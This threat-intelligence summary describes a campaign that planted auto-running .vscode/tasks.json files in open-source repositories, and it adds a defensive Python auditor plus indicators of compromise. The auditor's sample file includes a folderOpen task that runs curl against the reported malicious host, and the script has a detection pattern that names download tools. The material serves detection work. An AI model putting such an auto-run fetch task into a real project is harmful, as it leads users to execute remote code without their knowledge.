Small Open-Source Maintainers Targeted by VS Code Tasks Malware
2026-01-26 • OSM
https://opensourcemalware.com/blog/oss-maintainters-vscode-tasks-compromised
OpenSourceMalware reported an ongoing campaign in which at least 21 small open-source maintainers had repositories modified with malicious .vscode/tasks.json files over 72 hours. The actor is listed as unknown, but the task files are described as closely resembling DPRK Contagious Interview tradecraft previously seen in Lazarus activity. The malicious tasks run automatically on folder open and download platform-specific Linux, macOS, or Windows scripts from vscode-extension-260120.vercel.app. Current payloads were described as innocuous placeholders, but victim feedback pointed to compromised GitHub personal access tokens or stolen SSH keys, making the access dangerous for future supply-chain payloads such as Beavertail.
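One way to audit a checkout for the pattern described above, as an added example that is not code from OpenSourceMalware or the affected projects: it parses `.vscode/tasks.json` (comments and trailing commas included) and reports every command bound to `runOptions.runOn: folderOpen`, including the per-OS overrides. The function names and the sample file are constructed for illustration; only the host name comes from the report.

```python
import json
import re

IOC_HOST = "vscode-extension-260120.vercel.app"  # host named in the report
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)
_FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://", re.I)

def load_jsonc(text):
    """tasks.json allows comments and trailing commas; drop both outside strings."""
    for _ in range(2):  # 2nd pass catches commas that were followed by a comment
        text = _JSONC.sub(lambda m: m[0] if m[0][0] == '"' else "", text)
    return json.loads(text)

def command_lines(task):
    """Yield (platform, command text) for the task and its per-OS overrides."""
    for plat in ("default", "linux", "osx", "windows"):
        node = task if plat == "default" else task.get(plat, {})
        if "command" in node:
            yield plat, json.dumps([node["command"], node.get("args", [])])

def audit_tasks(text):
    """Report every command a task would run automatically on folder open."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        for plat, line in command_lines(task):
            reasons = ["runs on folderOpen"]
            if _FETCH.search(line):
                reasons.append("fetches remote content")
            if IOC_HOST in line:
                reasons.append("reported IoC host")
            findings.append({"label": task.get("label"), "platform": plat, "reasons": reasons})
    return findings

# Constructed sample for illustration, not a file recovered from the campaign.
SAMPLE = """{
  // comments and trailing commas are legal in tasks.json
  "version": "2.0.0", "tasks": [
    {"label": "build", "type": "shell", "command": "make", "args": ["all"],},
    {"label": "env-check", "type": "shell",
     "runOptions": {"runOn": "folderOpen"},
     "linux": {"command": "curl -s https://vscode-extension-260120.vercel.app/PLACEHOLDER"},
     "windows": {"command": "echo", "args": ["https://example.invalid/PLACEHOLDER"]},
    },
  ]
}"""
if __name__ == "__main__":
    print(json.dumps(audit_tasks(SAMPLE), indent=2))
```

Run it over the file's text from a clone inspected outside the editor, or from `git show <commit>:.vscode/tasks.json`, so the task never gets a chance to execute.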
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | https://vscode-extension-260120… | 2026-01-26 | 2026-01-26 |
| URL | https://vscode-extension-260120… | 2026-01-26 | 2026-01-26 |